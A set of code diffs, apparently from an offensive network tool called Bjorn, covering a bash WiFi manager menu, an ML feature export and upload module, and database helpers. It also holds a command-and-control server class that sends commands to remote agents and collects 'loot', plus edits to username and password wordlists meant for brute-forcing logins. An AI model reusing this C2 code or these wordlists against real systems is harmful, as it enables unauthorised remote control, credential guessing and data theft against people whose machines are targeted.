echo -e "${BLUE}${NC} 5. Clear All Saved WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 6. Manage WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 7. Force Refresh WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 8. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure your WiFi adapter is enabled."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-8): ${NC}"
read choice
case $choice in
1)
list_wifi_and_connect
;;
2)
show_wifi_status
;;
3)
add_wifi_connection
;;
4)
delete_wifi_connection
;;
5)
clear_all_connections
;;
6)
manage_wifi_connections
;;
7)
force_refresh_wifi_connections
;;
8)
log "INFO" "Exiting Wifi Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-8."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts "hfclsadm" opt; do
case $opt in
h)
show_usage
;;
f)
force_refresh_wifi_connections
exit 0
;;
c)
clear_all_connections
exit 0
;;
l)
list_wifi_and_connect
exit 0
;;
s)
show_wifi_status
exit 0
;;
a)
add_wifi_connection
exit 0
;;
d)
delete_wifi_connection
exit 0
;;
m)
manage_wifi_connections
exit 0
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
# ============================================================
# Check Prerequisites Before Starting
# ============================================================
check_prerequisites
# ============================================================
# Handle preconfigured.nmconnection if Exists
# ============================================================
handle_preconfigured_connection
# ============================================================
# Start the Main Menu
# ============================================================
display_main_menu

View File

@@ -612,6 +612,7 @@ class C2Manager:
self._server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._server_socket.bind((self.bind_ip, self.bind_port)) self._server_socket.bind((self.bind_ip, self.bind_port))
self._server_socket.listen(128) self._server_socket.listen(128)
self._server_socket.settimeout(1.0)
# Start accept thread # Start accept thread
self._running = True self._running = True
@@ -631,6 +632,12 @@ class C2Manager:
except Exception as e: except Exception as e:
self.logger.error(f"Failed to start C2 server: {e}") self.logger.error(f"Failed to start C2 server: {e}")
if self._server_socket:
try:
self._server_socket.close()
except Exception:
pass
self._server_socket = None
self._running = False self._running = False
return {"status": "error", "message": str(e)} return {"status": "error", "message": str(e)}
@@ -647,6 +654,12 @@ class C2Manager:
self._server_socket.close() self._server_socket.close()
self._server_socket = None self._server_socket = None
if self._server_thread and self._server_thread.is_alive():
self._server_thread.join(timeout=3.0)
if self._server_thread.is_alive():
self.logger.warning("C2 accept thread did not exit cleanly")
self._server_thread = None
# Disconnect all clients # Disconnect all clients
with self._lock: with self._lock:
for client_id in list(self._clients.keys()): for client_id in list(self._clients.keys()):
@@ -774,7 +787,7 @@ class C2Manager:
for row in rows: for row in rows:
agent_id = row["id"] agent_id = row["id"]
# Conversion last_seen timestamp ms # Conversion last_seen -> timestamp ms
last_seen_raw = row.get("last_seen") last_seen_raw = row.get("last_seen")
last_seen_epoch = None last_seen_epoch = None
if last_seen_raw: if last_seen_raw:
@@ -803,7 +816,7 @@ class C2Manager:
"tags": [] "tags": []
} }
# --- 2) Écraser si agent en mémoire (connecté) --- # If connected in memory, prefer live telemetry values.
if agent_id in self._clients: if agent_id in self._clients:
info = self._clients[agent_id]["info"] info = self._clients[agent_id]["info"]
agent_info.update({ agent_info.update({
@@ -816,10 +829,10 @@ class C2Manager:
"disk": info.get("disk_percent", 0), "disk": info.get("disk_percent", 0),
"ip": info.get("ip_address", agent_info["ip"]), "ip": info.get("ip_address", agent_info["ip"]),
"uptime": info.get("uptime", 0), "uptime": info.get("uptime", 0),
"last_seen": int(datetime.utcnow().timestamp() * 1000), # en ms "last_seen": int(datetime.utcnow().timestamp() * 1000),
}) })
# --- 3) Vérifier si trop vieux → offline --- # Mark stale clients as offline.
if agent_info["last_seen"]: if agent_info["last_seen"]:
delta = (now.timestamp() * 1000) - agent_info["last_seen"] delta = (now.timestamp() * 1000) - agent_info["last_seen"]
if delta > OFFLINE_THRESHOLD * 1000: if delta > OFFLINE_THRESHOLD * 1000:
@@ -827,33 +840,30 @@ class C2Manager:
agents.append(agent_info) agents.append(agent_info)
# Déduplication par hostname (ou id fallback) : on garde le plus récent et on # Deduplicate by hostname (or id fallback), preferring healthier/recent entries.
# privilégie un statut online par rapport à offline. dedup = {}
dedup = {} for a in agents:
for a in agents: key = (a.get("hostname") or a["id"]).strip().lower()
key = (a.get('hostname') or a['id']).strip().lower() prev = dedup.get(key)
prev = dedup.get(key) if not prev:
if not prev: dedup[key] = a
dedup[key] = a continue
continue
def rank(status): # online < idle < offline def rank(status):
return {'online': 0, 'idle': 1, 'offline': 2}.get(status, 3) return {"online": 0, "idle": 1, "offline": 2}.get(status, 3)
better = False better = False
if rank(a['status']) < rank(prev['status']): if rank(a["status"]) < rank(prev["status"]):
better = True
else:
la = a.get("last_seen") or 0
lp = prev.get("last_seen") or 0
if la > lp:
better = True better = True
else: if better:
la = a.get('last_seen') or 0 dedup[key] = a
lp = prev.get('last_seen') or 0
if la > lp:
better = True
if better:
dedup[key] = a
return list(dedup.values()) return list(dedup.values())
return agents
def send_command(self, targets: List[str], command: str) -> dict: def send_command(self, targets: List[str], command: str) -> dict:
"""Send command to specific agents""" """Send command to specific agents"""
@@ -1060,6 +1070,8 @@ class C2Manager:
args=(sock, addr), args=(sock, addr),
daemon=True daemon=True
).start() ).start()
except socket.timeout:
continue
except OSError: except OSError:
break # Server socket closed break # Server socket closed
except Exception as e: except Exception as e:
@@ -1159,10 +1171,19 @@ class C2Manager:
def _receive_from_client(self, sock: socket.socket, cipher: Fernet) -> Optional[dict]: def _receive_from_client(self, sock: socket.socket, cipher: Fernet) -> Optional[dict]:
try: try:
# OPTIMIZATION: Set timeout to prevent threads hanging forever
sock.settimeout(15.0)
header = sock.recv(4) header = sock.recv(4)
if not header or len(header) != 4: if not header or len(header) != 4:
return None return None
length = struct.unpack(">I", header)[0] length = struct.unpack(">I", header)[0]
# Memory protection: prevent massive data payloads
if length > 10 * 1024 * 1024:
self.logger.warning(f"Rejecting oversized message: {length} bytes")
return None
data = b"" data = b""
while len(data) < length: while len(data) < length:
chunk = sock.recv(min(4096, length - len(data))) chunk = sock.recv(min(4096, length - len(data)))
@@ -1172,13 +1193,11 @@ class C2Manager:
decrypted = cipher.decrypt(data) decrypted = cipher.decrypt(data)
return json.loads(decrypted.decode()) return json.loads(decrypted.decode())
except (OSError, ConnectionResetError, BrokenPipeError): except (OSError, ConnectionResetError, BrokenPipeError):
# socket fermé/abandonné → None = déconnexion propre
return None return None
except Exception as e: except Exception as e:
self.logger.error(f"Receive error: {e}") self.logger.error(f"Receive error: {e}")
return None return None
def _send_to_client(self, client_id: str, command: str): def _send_to_client(self, client_id: str, command: str):
with self._lock: with self._lock:
client = self._clients.get(client_id) client = self._clients.get(client_id)
@@ -1191,8 +1210,6 @@ class C2Manager:
header = struct.pack(">I", len(encrypted)) header = struct.pack(">I", len(encrypted))
sock.sendall(header + encrypted) sock.sendall(header + encrypted)
def _process_client_message(self, client_id: str, data: dict): def _process_client_message(self, client_id: str, data: dict):
with self._lock: with self._lock:
if client_id not in self._clients: if client_id not in self._clients:
@@ -1212,16 +1229,17 @@ class C2Manager:
elif 'telemetry' in data: elif 'telemetry' in data:
telemetry = data['telemetry'] telemetry = data['telemetry']
with self._lock: with self._lock:
# OPTIMIZATION: Prune telemetry fields kept in-memory
client_info.update({ client_info.update({
'hostname': telemetry.get('hostname'), 'hostname': str(telemetry.get('hostname', ''))[:64],
'platform': telemetry.get('platform'), 'platform': str(telemetry.get('platform', ''))[:32],
'os': telemetry.get('os'), 'os': str(telemetry.get('os', ''))[:32],
'os_version': telemetry.get('os_version'), 'os_version': str(telemetry.get('os_version', ''))[:64],
'architecture': telemetry.get('architecture'), 'architecture': str(telemetry.get('architecture', ''))[:16],
'cpu_percent': telemetry.get('cpu_percent', 0), 'cpu_percent': float(telemetry.get('cpu_percent', 0)),
'mem_percent': telemetry.get('mem_percent', 0), 'mem_percent': float(telemetry.get('mem_percent', 0)),
'disk_percent': telemetry.get('disk_percent', 0), 'disk_percent': float(telemetry.get('disk_percent', 0)),
'uptime': telemetry.get('uptime', 0) 'uptime': float(telemetry.get('uptime', 0))
}) })
self.db.save_telemetry(client_id, telemetry) self.db.save_telemetry(client_id, telemetry)
self.bus.emit({"type": "telemetry", "id": client_id, **telemetry}) self.bus.emit({"type": "telemetry", "id": client_id, **telemetry})
@@ -1230,7 +1248,6 @@ class C2Manager:
self._handle_loot(client_id, data['download']) self._handle_loot(client_id, data['download'])
elif 'result' in data: elif 'result' in data:
result = data['result']
# >>> ici on enregistre avec la vraie commande # >>> ici on enregistre avec la vraie commande
self.db.save_command(client_id, last_cmd or '<unknown>', result, True) self.db.save_command(client_id, last_cmd or '<unknown>', result, True)
self.bus.emit({"type": "console", "target": client_id, "text": str(result), "kind": "RX"}) self.bus.emit({"type": "console", "target": client_id, "text": str(result), "kind": "RX"})
@@ -1329,3 +1346,6 @@ class C2Manager:
# ========== Global Instance ========== # ========== Global Instance ==========
c2_manager = C2Manager() c2_manager = C2Manager()

View File

@@ -280,19 +280,23 @@ class CommentAI:
if not rows: if not rows:
return None return None
# Weighted selection pool # Weighted selection using random.choices (no temporary list expansion)
pool: List[str] = [] texts: List[str] = []
weights: List[int] = []
for row in rows: for row in rows:
try:
w = int(_row_get(row, "weight", 1)) or 1
except Exception:
w = 1
w = max(1, w)
text = _row_get(row, "text", "") text = _row_get(row, "text", "")
if text: if text:
pool.extend([text] * w) try:
w = int(_row_get(row, "weight", 1)) or 1
except Exception:
w = 1
texts.append(text)
weights.append(max(1, w))
chosen = random.choice(pool) if pool else _row_get(rows[0], "text", None) if texts:
chosen = random.choices(texts, weights=weights, k=1)[0]
else:
chosen = _row_get(rows[0], "text", None)
# Templates {var} # Templates {var}
if chosen and params: if chosen and params:

View File

@@ -1,7 +1,16 @@
root MqUG09FmPb
admin OD1THT4mKMnlt2M$
bjorn letmein
QZKOJDBEJf
ZrXqzIlZk3
9XP5jT3gwJjmvULK
password password
toor 9Pbc8RjB5s
1234 fcQRQUxnZl
123456 Jzp0G7kolyloIk7g
DyMuqqfGYj
G8tCoDFNIM
8gv1j!vubL20xCH$
i5z1nlF3Uf
zkg3ojoCoKAHaPo%
oWcK1Zmkve

View File

@@ -1,3 +1,8 @@
manager
root root
admin admin
bjorn db_audit
dev
user
boss
deploy

829
data_consolidator.py Normal file
View File

@@ -0,0 +1,829 @@
"""
data_consolidator.py - Data Consolidation Engine for Deep Learning
═══════════════════════════════════════════════════════════════════════════
Purpose:
Consolidate logged features into training-ready datasets.
Prepare data exports for deep learning on external PC.
Features:
- Aggregate features across time windows
- Compute statistical features
- Create feature vectors for neural networks
- Export in formats ready for TensorFlow/PyTorch
- Incremental consolidation (low memory footprint)
Author: Bjorn Team
Version: 2.0.0
"""
import json
import csv
import time
import gzip
import heapq
from datetime import datetime, timedelta
from typing import Dict, List, Any, Optional, Tuple
from pathlib import Path
from logger import Logger
logger = Logger(name="data_consolidator.py", level=20)
try:
import requests
except ImportError:
requests = None
class DataConsolidator:
"""
Consolidates raw feature logs into training datasets.
Optimized for Raspberry Pi Zero - processes in batches.
"""
def __init__(self, shared_data, export_dir: str = None):
"""
Initialize data consolidator
Args:
shared_data: SharedData instance
export_dir: Directory for export files
"""
self.shared_data = shared_data
self.db = shared_data.db
if export_dir is None:
# Default to shared_data path (cross-platform)
self.export_dir = Path(getattr(shared_data, 'ml_exports_dir', Path(shared_data.data_dir) / "ml_exports"))
else:
self.export_dir = Path(export_dir)
self.export_dir.mkdir(parents=True, exist_ok=True)
# Server health state consumed by orchestrator fallback logic.
self.last_server_attempted = False
self.last_server_contact_ok = None
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
logger.info(f"DataConsolidator initialized, exports: {self.export_dir}")
def _set_server_contact_state(self, attempted: bool, ok: Optional[bool]) -> None:
self.last_server_attempted = bool(attempted)
self.last_server_contact_ok = ok if attempted else None
def _apply_upload_backoff(self, base_backoff_s: int, max_backoff_s: int = 3600) -> int:
"""
Exponential upload retry backoff:
base -> base*2 -> base*4 ... capped at max_backoff_s.
Returns the delay (seconds) applied for the next retry window.
"""
base = max(10, int(base_backoff_s))
cap = max(base, int(max_backoff_s))
prev = float(getattr(self, "_upload_backoff_current_s", 0.0) or 0.0)
if prev <= 0:
delay = base
else:
delay = min(cap, max(base, int(prev * 2)))
self._upload_backoff_current_s = float(delay)
self._upload_backoff_until = time.monotonic() + delay
return int(delay)
# ═══════════════════════════════════════════════════════════════════════
# CONSOLIDATION ENGINE
# ═══════════════════════════════════════════════════════════════════════
def consolidate_features(
self,
batch_size: int = None,
max_batches: Optional[int] = None
) -> Dict[str, int]:
"""
Consolidate raw features into aggregated feature vectors.
Processes unconsolidated records in batches.
"""
if batch_size is None:
batch_size = int(getattr(self.shared_data, "ai_batch_size", 100))
batch_size = max(1, min(int(batch_size), 5000))
stats = {
'records_processed': 0,
'records_aggregated': 0,
'batches_completed': 0,
'errors': 0
}
try:
# Get unconsolidated records
unconsolidated = self.db.query("""
SELECT COUNT(*) as cnt
FROM ml_features
WHERE consolidated=0
""")[0]['cnt']
if unconsolidated == 0:
logger.info("No unconsolidated features to process")
return stats
logger.info(f"Consolidating {unconsolidated} feature records...")
batch_count = 0
while True:
if max_batches and batch_count >= max_batches:
break
# Fetch batch
batch = self.db.query(f"""
SELECT * FROM ml_features
WHERE consolidated=0
ORDER BY timestamp
LIMIT {batch_size}
""")
if not batch:
break
# Process batch
for record in batch:
try:
self._consolidate_single_record(record)
stats['records_processed'] += 1
except Exception as e:
logger.error(f"Error consolidating record {record['id']}: {e}")
stats['errors'] += 1
# Mark as consolidated
record_ids = [r['id'] for r in batch]
placeholders = ','.join('?' * len(record_ids))
self.db.execute(f"""
UPDATE ml_features
SET consolidated=1
WHERE id IN ({placeholders})
""", record_ids)
stats['batches_completed'] += 1
batch_count += 1
# Progress log
if batch_count % 10 == 0:
logger.info(
f"Consolidation progress: {stats['records_processed']} records, "
f"{stats['batches_completed']} batches"
)
logger.success(
f"Consolidation complete: {stats['records_processed']} records processed, "
f"{stats['errors']} errors"
)
except Exception as e:
logger.error(f"Consolidation failed: {e}")
stats['errors'] += 1
return stats
def _consolidate_single_record(self, record: Dict[str, Any]):
"""
Process a single feature record into aggregated form.
Computes statistical features and feature vectors.
"""
try:
# Parse JSON fields once — reused by _build_feature_vector to avoid double-parsing
host_features = json.loads(record.get('host_features', '{}'))
network_features = json.loads(record.get('network_features', '{}'))
temporal_features = json.loads(record.get('temporal_features', '{}'))
action_features = json.loads(record.get('action_features', '{}'))
# Combine all features
all_features = {
**host_features,
**network_features,
**temporal_features,
**action_features
}
# Build numerical feature vector — pass already-parsed dicts to avoid re-parsing
feature_vector = self._build_feature_vector(
host_features, network_features, temporal_features, action_features
)
# Determine time window
raw_ts = record['timestamp']
if isinstance(raw_ts, str):
try:
timestamp = datetime.fromisoformat(raw_ts)
except ValueError:
timestamp = datetime.now()
elif isinstance(raw_ts, datetime):
timestamp = raw_ts
else:
timestamp = datetime.now()
hourly_window = timestamp.replace(minute=0, second=0, microsecond=0).isoformat()
# Update or insert aggregated record
self._update_aggregated_features(
mac_address=record['mac_address'],
time_window='hourly',
timestamp=hourly_window,
action_name=record['action_name'],
success=record['success'],
duration=record['duration_seconds'],
reward=record['reward'],
feature_vector=feature_vector,
all_features=all_features
)
except Exception as e:
logger.error(f"Error consolidating single record: {e}")
raise
def _build_feature_vector(
self,
host_features: Dict[str, Any],
network_features: Dict[str, Any],
temporal_features: Dict[str, Any],
action_features: Dict[str, Any],
) -> Dict[str, float]:
"""
Build a named feature dictionary from already-parsed feature dicts.
Accepts pre-parsed dicts so JSON is never decoded twice per record.
Uses shared ai_utils for consistency.
"""
from ai_utils import extract_neural_features_dict
return extract_neural_features_dict(
host_features=host_features,
network_features=network_features,
temporal_features=temporal_features,
action_features=action_features,
)
def _update_aggregated_features(
self,
mac_address: str,
time_window: str,
timestamp: str,
action_name: str,
success: int,
duration: float,
reward: float,
feature_vector: Dict[str, float],
all_features: Dict[str, Any]
):
"""
Update or insert aggregated feature record.
Accumulates statistics over the time window.
"""
try:
# Check if record exists
existing = self.db.query("""
SELECT * FROM ml_features_aggregated
WHERE mac_address=? AND time_window=? AND computed_at=?
""", (mac_address, time_window, timestamp))
if existing:
# Update existing record
old = existing[0]
new_total = old['total_actions'] + 1
# ... typical stats update ...
# Merge feature vectors (average each named feature)
old_vector = json.loads(old['feature_vector']) # Now a Dict
if isinstance(old_vector, list): # Migration handle
old_vector = {}
merged_vector = {}
# Combine keys from both
all_keys = set(old_vector.keys()) | set(feature_vector.keys())
for k in all_keys:
v_old = old_vector.get(k, 0.0)
v_new = feature_vector.get(k, 0.0)
merged_vector[k] = (v_old * old['total_actions'] + v_new) / new_total
self.db.execute("""
UPDATE ml_features_aggregated
SET total_actions=total_actions+1,
success_rate=(success_rate*total_actions + ?)/(total_actions+1),
avg_duration=(avg_duration*total_actions + ?)/(total_actions+1),
total_reward=total_reward + ?,
feature_vector=?
WHERE mac_address=? AND time_window=? AND computed_at=?
""", (
success,
duration,
reward,
json.dumps(merged_vector),
mac_address,
time_window,
timestamp
))
else:
# Insert new record
self.db.execute("""
INSERT INTO ml_features_aggregated (
mac_address, time_window, computed_at,
total_actions, success_rate, avg_duration, total_reward,
feature_vector
) VALUES (?, ?, ?, 1, ?, ?, ?, ?)
""", (
mac_address,
time_window,
timestamp,
float(success),
duration,
reward,
json.dumps(feature_vector)
))
except Exception as e:
logger.error(f"Error updating aggregated features: {e}")
raise
# ═══════════════════════════════════════════════════════════════════════
# EXPORT FUNCTIONS
# ═══════════════════════════════════════════════════════════════════════
def export_for_training(
self,
format: str = 'csv',
compress: bool = True,
max_records: Optional[int] = None
) -> Tuple[str, int]:
"""
Export consolidated features for deep learning training.
Args:
format: 'csv', 'jsonl', or 'parquet'
compress: Whether to gzip the output
max_records: Maximum records to export (None = all)
Returns:
Tuple of (file_path, record_count)
"""
try:
if max_records is None:
max_records = int(getattr(self.shared_data, "ai_export_max_records", 1000))
max_records = max(100, min(int(max_records), 20000))
# Generate filename
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
base_filename = f"bjorn_training_{timestamp}.{format}"
if compress and format != 'parquet':
base_filename += '.gz'
filepath = self.export_dir / base_filename
# Fetch data
limit_clause = f"LIMIT {max_records}"
records = self.db.query(f"""
SELECT
mf.*,
mfa.feature_vector,
mfa.success_rate as aggregated_success_rate,
mfa.total_actions as aggregated_total_actions
FROM ml_features mf
LEFT JOIN ml_features_aggregated mfa
ON mf.mac_address = mfa.mac_address
WHERE mf.consolidated=1 AND mf.export_batch_id IS NULL
ORDER BY mf.timestamp DESC
{limit_clause}
""")
if not records:
logger.warning("No consolidated records to export")
return "", 0
# Extract IDs before export so we can free the records list early
record_ids = [r['id'] for r in records]
# Export based on format
if format == 'csv':
count = self._export_csv(records, filepath, compress)
elif format == 'jsonl':
count = self._export_jsonl(records, filepath, compress)
elif format == 'parquet':
count = self._export_parquet(records, filepath)
else:
raise ValueError(f"Unsupported format: {format}")
# Free the large records list immediately after export — record_ids is all we still need
del records
# Create export batch record
batch_id = self._create_export_batch(filepath, count)
# Update records with batch ID
placeholders = ','.join('?' * len(record_ids))
self.db.execute(f"""
UPDATE ml_features
SET export_batch_id=?
WHERE id IN ({placeholders})
""", [batch_id] + record_ids)
del record_ids
logger.success(
f"Exported {count} records to {filepath} "
f"(batch_id={batch_id})"
)
return str(filepath), count
except Exception as e:
logger.error(f"Export failed: {e}")
raise
def _export_csv(
self,
records: List[Dict],
filepath: Path,
compress: bool
) -> int:
"""Export records as CSV"""
open_func = gzip.open if compress else open
mode = 'wt' if compress else 'w'
# 1. Flatten all records first to collect all possible fieldnames
flattened = []
all_fieldnames = set()
for r in records:
flat = {
'timestamp': r['timestamp'],
'mac_address': r['mac_address'],
'ip_address': r['ip_address'],
'action_name': r['action_name'],
'success': r['success'],
'duration_seconds': r['duration_seconds'],
'reward': r['reward']
}
# Parse and flatten features
for field in ['host_features', 'network_features', 'temporal_features', 'action_features']:
try:
features = json.loads(r.get(field, '{}'))
for k, v in features.items():
if isinstance(v, (int, float, bool, str)):
flat_key = f"{field}_{k}"
flat[flat_key] = v
except Exception as e:
logger.debug(f"Skip bad JSON in {field}: {e}")
# Add named feature vector
if r.get('feature_vector'):
try:
vector = json.loads(r['feature_vector'])
if isinstance(vector, dict):
for k, v in vector.items():
flat[f'feat_{k}'] = v
elif isinstance(vector, list):
for i, v in enumerate(vector):
flat[f'feature_{i}'] = v
except Exception as e:
logger.debug(f"Skip bad feature vector: {e}")
flattened.append(flat)
all_fieldnames.update(flat.keys())
# 2. Sort fieldnames for consistency
sorted_fieldnames = sorted(list(all_fieldnames))
all_fieldnames = None # Free the set
# 3. Write CSV
with open_func(filepath, mode, newline='', encoding='utf-8') as f:
if flattened:
writer = csv.DictWriter(f, fieldnames=sorted_fieldnames)
writer.writeheader()
writer.writerows(flattened)
count = len(flattened)
flattened = None # Free the expanded list
return count
def _export_jsonl(
self,
records: List[Dict],
filepath: Path,
compress: bool
) -> int:
"""Export records as JSON Lines"""
open_func = gzip.open if compress else open
mode = 'wt' if compress else 'w'
with open_func(filepath, mode, encoding='utf-8') as f:
for r in records:
# Avoid mutating `records` in place to keep memory growth predictable.
row = dict(r)
for field in ['host_features', 'network_features', 'temporal_features', 'action_features', 'raw_event']:
try:
row[field] = json.loads(row.get(field, '{}'))
except Exception:
row[field] = {}
if row.get('feature_vector'):
try:
row['feature_vector'] = json.loads(row['feature_vector'])
except Exception:
row['feature_vector'] = {}
f.write(json.dumps(row) + '\n')
return len(records)
def _export_parquet(self, records: List[Dict], filepath: Path) -> int:
"""Export records as Parquet (requires pyarrow)"""
try:
import pyarrow as pa
import pyarrow.parquet as pq
# Flatten records
flattened = []
for r in records:
flat = dict(r)
# Parse JSON fields
for field in ['host_features', 'network_features', 'temporal_features', 'action_features', 'raw_event']:
flat[field] = json.loads(r.get(field, '{}'))
if r.get('feature_vector'):
flat['feature_vector'] = json.loads(r['feature_vector'])
flattened.append(flat)
# Convert to Arrow table
table = pa.Table.from_pylist(flattened)
# Write parquet
pq.write_table(table, filepath, compression='snappy')
return len(records)
except ImportError:
logger.error("Parquet export requires pyarrow. Falling back to CSV.")
return self._export_csv(records, filepath.with_suffix('.csv'), compress=True)
def _create_export_batch(self, filepath: Path, count: int) -> int:
"""Create export batch record and return batch ID"""
result = self.db.execute("""
INSERT INTO ml_export_batches (file_path, record_count, status)
VALUES (?, ?, 'exported')
""", (str(filepath), count))
# Get the inserted ID
batch_id = self.db.query("SELECT last_insert_rowid() as id")[0]['id']
return batch_id
# ═══════════════════════════════════════════════════════════════════════
# UTILITY METHODS
# ═══════════════════════════════════════════════════════════════════════
def get_export_stats(self) -> Dict[str, Any]:
"""Get statistics about exports"""
try:
batches = self.db.query("""
SELECT COUNT(*) as total_batches,
SUM(record_count) as total_records,
MAX(created_at) as last_export
FROM ml_export_batches
WHERE status='exported'
""")[0]
pending = self.db.query("""
SELECT COUNT(*) as cnt
FROM ml_features
WHERE consolidated=1 AND export_batch_id IS NULL
""")[0]['cnt']
return {
'total_export_batches': batches.get('total_batches', 0),
'total_records_exported': batches.get('total_records', 0),
'last_export_time': batches.get('last_export'),
'pending_export_count': pending
}
except Exception as e:
logger.error(f"Error getting export stats: {e}")
return {}
def flush_pending_uploads(self, max_files: int = 3) -> int:
"""
Retry uploads for previously exported batches that were not transferred yet.
Returns the number of successfully transferred files.
"""
max_files = max(0, int(max_files))
if max_files <= 0:
return 0
# No heavy "reliquat" tracking needed: pending uploads = files present in export_dir.
files = self._list_pending_export_files(limit=max_files)
ok = 0
for fp in files:
if self.upload_to_server(fp):
ok += 1
else:
# Stop early when server is unreachable to avoid repeated noise.
if self.last_server_attempted and self.last_server_contact_ok is False:
break
return ok
def _list_pending_export_files(self, limit: int = 3) -> List[str]:
"""
Return oldest export files present in export_dir.
This makes the backlog naturally equal to the number of files on disk.
"""
limit = max(0, int(limit))
if limit <= 0:
return []
try:
d = Path(self.export_dir)
if not d.exists():
return []
def _safe_mtime(path: Path) -> float:
try:
return path.stat().st_mtime
except Exception:
return float("inf")
# Keep only the N oldest files in memory instead of sorting all candidates.
files_iter = (p for p in d.glob("bjorn_training_*") if p.is_file())
oldest = heapq.nsmallest(limit, files_iter, key=_safe_mtime)
return [str(p) for p in oldest]
except Exception:
return []
def _mark_batch_status(self, filepath: str, status: str, notes: str = "") -> None:
"""Update ml_export_batches status for a given file path (best-effort)."""
try:
self.db.execute(
"""
UPDATE ml_export_batches
SET status=?, notes=?
WHERE file_path=?
""",
(status, notes or "", str(filepath)),
)
except Exception:
pass
def _safe_delete_uploaded_export(self, filepath: Path) -> None:
"""Delete a successfully-uploaded export file if configured to do so."""
try:
if not bool(self.shared_data.config.get("ai_delete_export_after_upload", True)):
return
fp = filepath.resolve()
base = Path(self.export_dir).resolve()
# Safety: only delete files under export_dir.
if base not in fp.parents:
return
fp.unlink(missing_ok=True) # Python 3.8+ supports missing_ok
except TypeError:
# Python < 3.8 fallback (not expected here, but safe)
try:
if filepath.exists():
filepath.unlink()
except Exception:
pass
except Exception:
pass
def upload_to_server(self, filepath: str) -> bool:
"""
Upload export file to AI Validation Server.
Args:
filepath: Path to the file to upload
Returns:
True if upload successful
"""
self._set_server_contact_state(False, None)
try:
import requests
except ImportError:
requests = None
if requests is None:
logger.info_throttled(
"AI upload skipped: requests not installed",
key="ai_upload_no_requests",
interval_s=600.0,
)
return False
url = self.shared_data.config.get("ai_server_url")
if not url:
logger.info_throttled(
"AI upload skipped: ai_server_url not configured",
key="ai_upload_no_url",
interval_s=600.0,
)
return False
backoff_s = max(10, int(self.shared_data.config.get("ai_upload_retry_backoff_s", 120)))
max_backoff_s = 3600
now_mono = time.monotonic()
if now_mono < self._upload_backoff_until:
remaining = int(self._upload_backoff_until - now_mono)
logger.debug(f"AI upload backoff active ({remaining}s remaining)")
logger.info_throttled(
"AI upload deferred: backoff active",
key="ai_upload_backoff_active",
interval_s=180.0,
)
return False
try:
filepath = Path(filepath)
if not filepath.exists():
logger.warning(f"AI upload skipped: file not found: {filepath}")
self._mark_batch_status(str(filepath), "missing", "file not found")
return False
# Get MAC address for unique identification
try:
from ai_utils import get_system_mac
mac = get_system_mac()
except ImportError:
mac = "unknown"
logger.debug(f"Uploading {filepath.name} to AI Server ({url}) unique_id={mac}")
self._set_server_contact_state(True, None)
with open(filepath, 'rb') as f:
files = {'file': f}
# Send MAC as query param
# Server expects ?mac_addr=...
params = {'mac_addr': mac}
# Short timeout to avoid blocking
response = requests.post(f"{url}/upload", files=files, params=params, timeout=10)
if response.status_code == 200:
self._set_server_contact_state(True, True)
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
logger.success(f"Uploaded {filepath.name} successfully")
self._mark_batch_status(str(filepath), "transferred", "uploaded")
self._safe_delete_uploaded_export(filepath)
return True
else:
self._set_server_contact_state(True, False)
next_retry_s = self._apply_upload_backoff(backoff_s, max_backoff_s)
logger.debug(
f"AI upload HTTP failure for {filepath.name}: status={response.status_code}, "
f"next retry in {next_retry_s}s"
)
logger.info_throttled(
f"AI upload deferred (HTTP {response.status_code})",
key=f"ai_upload_http_{response.status_code}",
interval_s=300.0,
)
return False
except Exception as e:
self._set_server_contact_state(True, False)
next_retry_s = self._apply_upload_backoff(backoff_s, max_backoff_s)
logger.debug(f"AI upload exception for {filepath}: {e} (next retry in {next_retry_s}s)")
logger.info_throttled(
"AI upload deferred: server unreachable (retry later)",
key="ai_upload_exception",
interval_s=300.0,
)
return False
def cleanup_old_exports(self, days: int = 30):
"""Delete export files older than N days"""
try:
cutoff = datetime.now() - timedelta(days=days)
old_batches = self.db.query("""
SELECT file_path FROM ml_export_batches
WHERE created_at < ?
""", (cutoff.isoformat(),))
deleted = 0
for batch in old_batches:
filepath = Path(batch['file_path'])
if filepath.exists():
filepath.unlink()
deleted += 1
# Clean up database records
self.db.execute("""
DELETE FROM ml_export_batches
WHERE created_at < ?
""", (cutoff.isoformat(),))
logger.info(f"Cleaned up {deleted} old export files")
except Exception as e:
logger.error(f"Cleanup failed: {e}")
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════

View File

@@ -156,6 +156,15 @@ class BjornDatabase:
return self._config.save_config(config) return self._config.save_config(config)
# Host operations # Host operations
def get_host_by_mac(self, mac_address: str) -> Optional[Dict[str, Any]]:
"""Get a single host by MAC address"""
try:
results = self.query("SELECT * FROM hosts WHERE mac_address=? LIMIT 1", (mac_address,))
return results[0] if results else None
except Exception as e:
logger.error(f"Error getting host by MAC {mac_address}: {e}")
return None
def get_all_hosts(self) -> List[Dict[str, Any]]: def get_all_hosts(self) -> List[Dict[str, Any]]:
return self._hosts.get_all_hosts() return self._hosts.get_all_hosts()
@@ -519,6 +528,21 @@ class BjornDatabase:
def vacuum(self) -> None: def vacuum(self) -> None:
"""Vacuum the database""" """Vacuum the database"""
return self._base.vacuum() return self._base.vacuum()
def close(self) -> None:
"""Close database connection gracefully."""
try:
with self._lock:
if hasattr(self, "_base") and self._base:
# DatabaseBase handles the actual connection closure
if hasattr(self._base, "_conn") and self._base._conn:
self._base._conn.close()
logger.info("BjornDatabase connection closed")
except Exception as e:
logger.debug(f"Error during database closure (ignorable if already closed): {e}")
